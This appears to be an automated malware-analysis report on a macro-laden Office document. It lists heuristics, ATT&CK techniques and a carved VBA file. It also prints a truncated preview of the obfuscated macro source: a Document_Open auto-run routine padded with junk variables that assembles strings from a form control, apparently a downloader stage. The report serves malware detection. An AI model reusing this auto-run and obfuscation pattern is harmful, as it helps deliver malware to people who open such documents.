Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an Office document containing VBA macros, specifically a Document_Open macro that runs automatically when the document is opened. The presence of GetObject calls and p-code execution tokens strongly suggests an attempt to run malicious code. Although the VBA source itself is heavily obfuscated and truncated, the overall pattern indicates it is designed to download and execute a second-stage payload.
Heuristics (5)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13029 bytes | 01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vxhmmvbaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Qfxrbphtdohcu As String
Dim Vzhnsdtsv As String
Zpjrgufusy = Yhvepkxf
Siyfeutxm = (Pqrjlimx)
Kewjgxyeiymou = 61
Dim Tapkaulo As Boolean
Rdvdbkhyfh = "Accusamus ab eum sed."
Dim Wyxvtecn As Double
Dim Uisixmyeyquz As Double
Dim Dahoeqopyreq As String
Bgloiviml = (194)
Dim Vzajnhwjes As Double
Dim Oilgfkbegytdr As Integer
Rtkqpocjq = Ljhhjnijx
Dim Odckofwgxrice As String
Dim Bdilzuszyrwz As Boolean
Dim Uhgzuehne As String
Nkqocgcqplfbl = (Wddsrfga)
Cdkmmoyipl = ("Laboriosam quaerat.")
Kwltjztp = (Sridjmirgjnf)
Dim Sedxgtwv As Double
Thhywhgnchks = Emaxfaoewh
Wzydftpqq
Dim Gkumihrvjg As Double
Dim Dkcczrfto As String
Uuhlarewpp = Usrfkdszyx
Glawtnzykaar = (Refjutuzhjhlv)
Wlxtpfpqhdcqk = 106
Dim Szdomntodiwg As String
Ohrjcopcymq = "Animi et et aliquam."
Dim Xgrckznrhhg As Integer
Dim Cxultylasv As Boolean
Dim Imepbrykz As Boolean
Lfmhpzhzk = (350)
Dim Lrimtrqnelgv As Boolean
Dim Jbfqitihpi As String
Rvalvabob = Oygtlqwfj
Dim Gxbjclkecahm As Integer
Dim Mspgunlwvqrb As Double
Dim Qscvwwodklype As Integer
Ghmgyyygzp = (Kcksalnnjx)
Dgjieieiolo = ("Sint dolore est architecto et molestiae.")
Vcysldgzn = (Ztxerjbi)
Dim Crppcqlotznbm As Double
Pvxteqqcii = Zrfkgmjski
End Sub
Attribute VB_Name = "Qzuqpezagbmaa"
Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Miqfbsgds"
Function Vfbbzngres()
Dim Pxrhifzlzvlc As String
Dim Xpfftqarxt As String
Ngxvkylofaace = Qoeroetmumk
Syaxymssod = (Rkhwocatzkc)
Usuucjzo = 743
Dim Gadeshybksext As String
Gkkpkhvhveu = "Tempora cumque modi quia."
Dim Mumzpoawlyima As String
Dim Axwyiewzpyro As Integer
Dim Hayjapqgfiek As Double
Lbdjzegyhvpu = (910)
Dim Xaxaqeexkcas As String
Dim Souylbnnviog As String
Sctfzuifl = Oqnraigcmgtb
Dim Nijeoljsvf As Boolean
Dim Vtglncqdwl As Boolean
Dim Uaiezcybcxmmz As String
Slwuijrnnwatq = (Mcinjodfstg)
Xhummgxsz = ("Magnam consectetur labore.")
Mdmuhziiqnk = (Lqipgebc)
Dim Pgbngknwmm As Double
Gbixtlyp = Xqawximvooh
Ytgqobwapext = Vxhmmvbaq.Uvyizjypph
Dim Ywdggzsakinwk As Integer
Dim Mthdwzpnoli As String
Pmiyobtov = Yqqmuzvs
Rwfdjwiiov = (Jlyaohixb)
Gegjdsoqpbvy = 796
Dim Vffkghfd As Double
Fnuknkrla = "Corey"
Dim Zcnfpzeihomix As Double
Dim Dnvjmdpa As Double
Dim Xdcfjjxldwc As Boolean
Qhauirsex = (542)
Dim Geqqrvjciq As Double
Dim Ccxeoxuxzliec As Integer
Gilkamqyet = Hmzjoylyskmd
Dim Tlvwlogm As Double
Dim Xfrjldslidml As String
Dim Tfrnqvwi As Boolean
Tfdiisnvifmih = (Orbveqiltc)
Svhxocuqgzkcp = ("Quidem accusamus.")
Cuqlypacevmz = (Ukgcuvzbhx)
Dim Lfohyfozfqc As String
Istdcbdnf = Davusbmteld
Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog
Dim Lugkrqtb As String
Dim Avlkjhwqphxb As String
Ijkdbmlmixqrq = Bevofaemsrzjk
Cjoibifqzqjo = (Urqfsncbmzx)
Slccbkqugdiop = 722
Dim Wywmrxxajdr As Double
Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem."
Dim Uooiqdqoeodkl As Double
Dim Ksyjvbtjnxqd As Double
Dim Zkojvdima As Integer
Yawimammrve = (885)
Dim Hvbfalzaggedo As Double
Dim Vmyslvxawab As Double
Rtmvwpbab = Pnnsurexzw
Dim Wldckuef As Double
Dim Vintihzapuj As Integer
Dim Xifgevex As Double
Oqktnrgx = (Asefaixyzg)
Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.")
Ynlijwmz = (Dzfwygybe)
Dim Bntlrxosi As Double
Hxjjmqxzikgaq = Dkotlcdxxa
Domfzqsqs = Cghzatntygqc + Qzuqpez
... (truncated)